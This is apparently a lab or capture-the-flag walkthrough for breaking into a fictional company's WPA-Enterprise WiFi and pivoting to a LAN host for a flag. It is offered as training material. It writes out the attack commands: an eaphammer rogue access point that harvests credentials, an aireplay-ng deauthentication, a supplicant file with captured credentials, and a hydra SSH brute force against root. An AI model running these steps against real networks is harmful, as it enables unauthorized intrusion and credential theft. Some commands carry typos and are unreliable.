Pivoting over WiFi: WPA Enterprise

Your Red Team is hired by Global Marine Services to test the security of their HQ. You are given the responsibility of assessing their WiFi network. The WiFi network might lead to the machines on their private LAN. Everything else is off-limits.

Objective: Break into the WiFi network and recover the flag kept on one of their LAN systems.

Start the usual iw dev dance to put the device into monitor mode and check for the networks using airodump-ng.

iw dev wlan0 set monitor none

airdump-ng wlan0

Start Eaphammer

./eaphammer -i wlan0 --channel 6 --auth wpa-eap --essid GlobalMarineServices --creds

Deauth the client

aireplay-ng -o 100 -a D2:E9:6A:D3:B3:50 wlan0 --ignore-negative-one

Check the eaphammer logs to see the client's credentials

Create a WPA supplicant file and connect to the network.

network={
ssid="GlobalMarineServices"
scan_ssid=1
key_mgmt=WPA-EAP
eap=TTLS
identity="daniel"
anonymous_identity="anon"
password="shipittoday"
phase2="auth=PAP"
}

// connecting using the supplicant file
wpa_supplicant -B -Dnl80211 -iwlan1 -c supplicant.conf

Use dhclient to get an IP address.

An Nmap scan of the router reveals that port 80 is open. Curl port 80 to reveal the LAN address.

Scanning the router LAN interface reveals that port 22 is open. Brute force using hydra to reveal password, connect and then retrieve flag.

hydra -l root -P /root/wordlists/100-common-passwords.txt ssh://192.37.6.4